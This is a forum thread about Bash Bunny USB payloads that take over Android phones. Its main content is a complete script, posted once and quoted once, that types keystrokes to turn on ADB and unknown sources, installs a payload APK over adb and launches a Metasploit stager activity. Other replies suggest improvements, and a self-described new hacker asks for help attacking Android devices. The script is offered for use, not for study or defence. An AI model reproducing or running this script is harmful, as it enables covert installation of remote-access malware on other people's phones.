Jump to content

Android APK Install


r1ddl3r
 Share

Recommended Posts

Put together a quick and dirty bash bunny script. Allows unknown sources on Android device, grabs apk via webrowser, installs and opens.

https://github.com/JakeBernier/bashbunny/blob/master/android/web_delivery/payload.txt

Also working to get adb delivery method working. Curious if anyone knows of a Android keyboard shortcut that will quickly up settings to speed this up?

Link to comment
Share on other sites

Cool payload, here's a couple of suggestions.

  1. Put the key commands in a text file under a folder called phones. This will allow someone else to modify the payload for numerous other phones.
    e.g. phones/nexus9_v7.0.txt, phones/galaxys7_v7.0.txt
  2. Use the bash bunny as an ethernet device and pull the payload from a webserver there, so you don't rely on any external infrastructure.

Good stuff!

One more note, you could start and try the adb method in case the phone has USB debugging enabled. If not you can fall back to the key commands. I am working on a similar payload for android, but it doesn't have to do with apk's

Edited by LowValueTarget
Link to comment
Share on other sites

  • 1 year later...
I use this a lot myself.
# Enables ADB and unknown sources on a target abdroid
# Then pushes a payload APK via ADB
#
# Requires android-tools-adb installed on the Bash Bunny
#
# Purple ............Running HID emulation, enabling ADB and unknown sources
# Blue Blinking ...............Running ADB command to push payload.apk
# Red Blinking.......android failed to get an IP address from the Bash Bunny
# Green..............Finished
 
LED SETUP
GET TARGET_IP
GET SWITCH_POSITION
 
ATTACKMODE HID
LED ATTACK
Q RIGHTARROW
Q DELAY 200
Q RIGHTARROW
Q DELAY 200
Q RIGHTARROW
Q DELAY 200
Q RIGHTARROW
Q DELAY 200
Q RIGHTARROW
Q DELAY 200
Q DOWNARROW
Q DELAY 200
Q RIGHTARROW
Q DELAY 200
Q RIGHTARROW
Q DELAY 200
Q RIGHTARROW
Q DELAY 200
Q RIGHTARROW
Q DELAY 200
Q RIGHTARROW
Q DELAY 200
Q RIGHTARROW
Q DELAY 500
Q ENTER
Q DELAY 500
Q DOWNARROW
Q DELAY 800
Q ENTER
Q DELAY 800
Q ENTER
Q DELAY 500
Q DOWNARROW
Q DELAY 500
Q DOWNARROW
Q DELAY 500
Q ENTER
Q DELAY 200
Q ENTER
Q DELAY 200
Q ESCAPE
Q DELAY 200
Q ESCAPE
Q DELAY 200
Q ESCAPE
Q DELAY 200
Q ESCAPE
Q DELAY 200
Q ESCAPE
ATTACKMODE ECM_ETHERNET
LED B 2000
if [ -z "${TARGET_IP}" ]; then
    LED FAIL
exit 1
fi
adb connect ${TARGET_IP}
adb install /root/udisk/payloads/${SWITCH_POSITION}/payload.apk
adb shell "am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity"
LED FINISH
Link to comment
Share on other sites

Hi there! Can you please explain only little bit about this technique means what is it and why it is used?or guide me where i can find results about this...Actually i am a new hacker and have less knowledge in hacking android...i can hack android 5 and 4 easily with evil-droid or metasploit or FATRAt...so i need some more knowledge..help..Thank you!

 

Link to comment
Share on other sites

  • 2 weeks later...
  • 2 weeks later...
On 9/24/2018 at 9:34 PM, Shadowharvy said:

I use this a lot myself.
# Enables ADB and unknown sources on a target abdroid
# Then pushes a payload APK via ADB
#
# Requires android-tools-adb installed on the Bash Bunny
#
# Purple ............Running HID emulation, enabling ADB and unknown sources
# Blue Blinking ...............Running ADB command to push payload.apk
# Red Blinking.......android failed to get an IP address from the Bash Bunny
# Green..............Finished
 
LED SETUP
GET TARGET_IP
GET SWITCH_POSITION
 
ATTACKMODE HID
LED ATTACK
Q RIGHTARROW
Q DELAY 200
Q RIGHTARROW
Q DELAY 200
Q RIGHTARROW
Q DELAY 200
Q RIGHTARROW
Q DELAY 200
Q RIGHTARROW
Q DELAY 200
Q DOWNARROW
Q DELAY 200
Q RIGHTARROW
Q DELAY 200
Q RIGHTARROW
Q DELAY 200
Q RIGHTARROW
Q DELAY 200
Q RIGHTARROW
Q DELAY 200
Q RIGHTARROW
Q DELAY 200
Q RIGHTARROW
Q DELAY 500
Q ENTER
Q DELAY 500
Q DOWNARROW
Q DELAY 800
Q ENTER
Q DELAY 800
Q ENTER
Q DELAY 500
Q DOWNARROW
Q DELAY 500
Q DOWNARROW
Q DELAY 500
Q ENTER
Q DELAY 200
Q ENTER
Q DELAY 200
Q ESCAPE
Q DELAY 200
Q ESCAPE
Q DELAY 200
Q ESCAPE
Q DELAY 200
Q ESCAPE
Q DELAY 200
Q ESCAPE
ATTACKMODE ECM_ETHERNET
LED B 2000
if [ -z "${TARGET_IP}" ]; then
    LED FAIL
exit 1
fi
adb connect ${TARGET_IP}
adb install /root/udisk/payloads/${SWITCH_POSITION}/payload.apk
adb shell "am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity"
LED FINISH

hello Shadowharvy

im trying to execute a payload with a samsung galaxy s3, i have been working with the payload for android url_open but only can download my apk, im interesting in this part of your code adb install /root/udisk/payloads/${SWITCH_POSITION}/payload.apk, i think it is more easy for just insert the usb bash bunny and it will search our payload and execute it automaticly.

how can i install this requires ? # Requires android-tools-adb installed on the Bash Bunny

Thanks

  • Upvote 1
Link to comment
Share on other sites

  • 4 months later...

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...